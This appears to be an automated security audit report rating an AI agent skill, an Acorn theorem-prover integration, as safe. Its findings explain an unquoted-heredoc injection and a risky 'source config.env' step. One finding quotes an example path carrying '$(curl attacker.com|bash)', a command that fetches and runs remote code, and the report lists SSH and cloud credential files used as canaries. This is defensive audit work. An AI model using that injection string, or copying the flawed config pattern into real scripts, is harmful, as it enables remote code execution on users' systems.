Is flyingnobita/acorn-prover safe?

https://github.com/openclaw/skills/tree/main/skills/flyingnobita/acorn-prover

85
SAFE

The acorn-prover skill is a focused, legitimate Acorn theorem prover integration with no prompt injection, no canary violations, and no unexpected network activity. Its primary security weakness is a design pattern — using bash source on a config file generated from user-supplied shell arguments — that creates a code-execution risk if a user provides adversarially crafted filesystem paths or if config.env is tampered with post-installation. The skill content itself contains no malicious instructions.

Category Scores

Prompt Injection 88/100 · 30%
Data Exfiltration 85/100 · 25%
Code Execution 70/100 · 20%
Clone Behavior 93/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 82/100 · 5%

Findings (6)

MEDIUM Unquoted heredoc in setup.sh expands user-supplied paths as shell code -15

setup.sh uses cat > "$CONFIG_FILE" <<EOF with an unquoted delimiter, causing bash to expand $ACORN_LIB and $ACORN_PROJECT inline before writing to config.env. If a user supplies a path containing command substitution syntax (e.g., /valid/path/$(curl attacker.com|bash)), the substitution executes at write time. The directory existence check ([[ ! -d "$ACORN_LIB" ]]) fires before the write but does not sanitize metacharacters.

MEDIUM SKILL.md instructs agent to `source` a config file — executes arbitrary shell code -15

Step 4 of the setup workflow instructs the agent to run source skills/acorn-prover/config.env. The source (.) builtin executes the file as shell commands in the current process. If config.env contains any shell syntax beyond simple variable assignments — whether from heredoc injection, path traversal, or external tampering — it will execute with full agent privileges. This is a persistent risk on every invocation that triggers reconfiguration.

LOW Source command imports config variables into agent shell environment -8

Sourcing config.env sets ACORN_LIB, ACORN_PROJECT, and USE_MISE in the agent's shell environment. A manipulated config.env could additionally set PATH, LD_PRELOAD, LD_LIBRARY_PATH, or other environment variables that affect subsequent command execution for the rest of the session.

LOW User-provided filesystem paths written to persistent config without sanitization -10

The ACORN_LIB and ACORN_PROJECT values come from user input, are validated only for directory existence, and are then written verbatim to a persistent file (config.env). This file persists across sessions and is sourced on every reconfiguration. There is no restriction on paths pointing to sensitive directories (e.g., /etc, ~/.ssh) which could be referenced by subsequent acorn commands.

LOW Installation requires live network access to GitHub -7

The install process clones from https://github.com/openclaw/skills.git using sparse-checkout to retrieve only the acorn-prover subtree. This is expected for this skill distribution model, but means the installed content is controlled by the GitHub repository state at install time and could differ from what was audited if the repo is updated between audit and installation.

INFO Canary file accesses attributable to Oathe audit infrastructure, not skill 0

Filesystem events show .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and gcloud credentials were opened at 04:39:35 (5 seconds before the git clone began at 04:39:40) and again at ~1771907994 (post-install teardown). Timing and audit event sequencing indicate these are Oathe baseline collection and integrity verification reads, not skill-originated accesses. All canary files remain intact.